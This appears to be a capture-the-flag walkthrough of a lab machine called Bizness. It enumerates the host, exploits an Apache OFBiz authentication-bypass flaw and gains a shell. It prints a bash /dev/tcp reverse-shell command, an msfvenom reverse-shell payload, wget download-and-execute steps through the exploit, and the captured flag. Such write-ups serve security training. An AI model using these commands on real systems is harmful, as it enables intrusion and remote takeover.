Table of Contents
Bizness
Posted on
nmap
$ nmap -sV -sC -p- -Pn 10.10.11.252 -oA bizness Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-13 12:10 CET Nmap scan report for bizness.htb (10.10.11.252) Host is up (0.045s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA) | 256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA) |_ 256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519) 80/tcp open http nginx 1.18.0 |_http-server-header: nginx/1.18.0 |_http-title: Did not follow redirect to https://bizness.htb/ 443/tcp open ssl/http nginx 1.18.0 |_ssl-date: TLS randomness does not represent time |_http-trane-info: Problem with XML parsing of /evox/about | tls-alpn: |_ http/1.1 | ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK | Not valid before: 2023-12-14T20:03:40 |_Not valid after: 2328-11-10T20:03:40 | tls-nextprotoneg: |_ http/1.1 |_http-server-header: nginx/1.18.0 |_http-title: 400 The plain HTTP request was sent to HTTPS port 39415/tcp open tcpwrapped Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 33.76 second
The initial nmap scan reveals the domain of the system. I add a respective entry to the /etc/hosts and continue with the enumeration.
Initial enumeration
$ ffuf -u https://bizness.htb/FUZZ -ic -r -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -fs 27200 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : https://bizness.htb/FUZZ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt :: Follow redirects : true :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response size: 27200 ________________________________________________ content [Status: 200, Size: 11178, Words: 1222, Lines: 187, Duration: 1028ms] catalog [Status: 200, Size: 11331, Words: 1239, Lines: 188, Duration: 1693ms] marketing [Status: 200, Size: 11098, Words: 1211, Lines: 186, Duration: 1612ms] ar [Status: 200, Size: 11078, Words: 1211, Lines: 186, Duration: 1363ms] ap [Status: 200, Size: 11078, Words: 1211, Lines: 186, Duration: 3239ms] ecommerce [Status: 200, Size: 530, Words: 55, Lines: 9, Duration: 3923ms] ebay [Status: 200, Size: 11054, Words: 1209, Lines: 186, Duration: 955ms] control [Status: 200, Size: 34633, Words: 10468, Lines: 492, Duration: 649ms] manufacturing [Status: 200, Size: 11150, Words: 1211, Lines: 186, Duration: 1156ms] example [Status: 200, Size: 11154, Words: 1220, Lines: 188, Duration: 1130ms] bi [Status: 200, Size: 11059, Words: 1211, Lines: 186, Duration: 2325ms] accounting [Status: 200, Size: 11104, Words: 1211, Lines: 186, Duration: 635ms] webtools [Status: 200, Size: 9852, Words: 1003, Lines: 154, Duration: 1092ms] facility [Status: 200, Size: 11108, Words: 1211, Lines: 186, Duration: 1272ms] myportal [Status: 200, Size: 10725, Words: 1193, Lines: 180, Duration: 2676ms] sfa [Status: 200, Size: 11263, Words: 1236, Lines: 188, Duration: 1812ms] :: Progress: [220547/220547] :: Job [1/1] :: 314 req/sec :: Duration: [0:14:05] :: Errors: 0 ::
The ecommerce directory stands out as the response size is smaller compared to other responses.
When the ecommerce directory is accessed, it redirects to
https://bizness.htb/ecommerce/control/main. I instruct curl to follow the
redirect with the -L parameter.
$ curl -kL https://bizness.htb/ecommerce/ <!DOCTYPE html> <!-- Begin Screen component://ecommerce/widget/CommonScreens.xml#main --> <!-- Begin Screen component://ecommerce/widget/CommonScreens.xml#main-decorator --> <!-- Begin Section Widget --> <span>A Product Store has not been defined for this ecommerce site. A Product Store can be created using the ofbizsetup wizard.</span> <!-- End Section Widget --> <!-- End Screen component://ecommerce/widget/CommonScreens.xml#main-decorator --> <!-- End Screen component://ecommerce/widget/CommonScreens.xml#main -->
Interesting here is the string ofbizsetup. A quick search reveals that this
could be ofbiz, a enterprise resource planning tool written in Java. There is
already an exploit available to exploit a recent vulnerability in the
software. There is an explanation of the vulnerability here and exploit code
here.
According to the exploit code, I can check if the system is vulnerable via
a request to https://bizness.htb/webtools/control/ping?USERNAME=&PASSWORD=&requirePasswordChange=Y.
If it returns PONG, the system is vulnerable.
$ curl -kL 'https://bizness.htb/webtools/control/ping?USERNAME=&PASSWORD=&requirePasswordChange=Y'
PONG
This indicates that the system is vulnerable. After reviewing the exploit code, I am ok with running it. Initially, I was not able to get a reverse shell via
$ python3 exploit.py --url https://bizness.htb --cmd '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.6/443 0>&1"' [+] Generating payload... Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true [+] Payload generated successfully. [+] Sending malicious serialized payload... [+] The request has been successfully sent. Check the result of the command.
To test if command execution works, I first set up a tcpdump listener to look for incoming ICMP packets.
$ sudo tcpdump -i tun0 'icmp' [sudo] password for grumpa: tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
I test for command execution via a simple ping command.
$ python3 exploit.py --url https://bizness.htb --cmd 'ping -c 1 10.10.14.6' [+] Generating payload... Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true [+] Payload generated successfully. [+] Sending malicious serialized payload... [+] The request has been successfully sent. Check the result of the command.
After executing the ping payload, I receive a response in tcpdump. This means
that the command execution generally works.
$ sudo tcpdump -i tun0 'icmp' [sudo] password for grumpa: tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 13:42:24.210739 IP bizness.htb > boron: ICMP echo request, id 54421, seq 1, length 64 13:42:24.210774 IP boron > bizness.htb: ICMP echo reply, id 54421, seq 1, length 64 ^C 2 packets captured 2 packets received by filter 0 packets dropped by kernel
To get a reverse shell, I first created a reverse shell binary with msfvenom.
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=$(myip) LPORT=443 -f elf > foo [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 74 bytes Final size of elf file: 194 bytes
This must be served via HTTP so that it can be downloaded in the next step
$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Now I can use the remote code execution vulnerability to first download the reverse shell. Make it executable afterwards and lastly execute it.
$ python3 exploit.py --url https://bizness.htb --cmd 'wget http://10.10.14.6/foo -O /tmp/foo'
$ python3 exploit.py --url https://bizness.htb --cmd 'chmod +x /tmp/foo'
$ rlwrap -cAr nc -lvnp 443
$ python3 exploit.py --url https://bizness.htb --cmd '/tmp/foo'
I have an interactive session on the system now and can read the user flag.
$ rlwrap -cAr nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.6] from (UNKNOWN) [10.10.11.252] 60744 id uid=1001(ofbiz) gid=1001(ofbiz-operator) groups=1001(ofbiz-operator) cat /home/ofbiz/user.txt be5dd46b2cf8dc5a86dfe653188445d4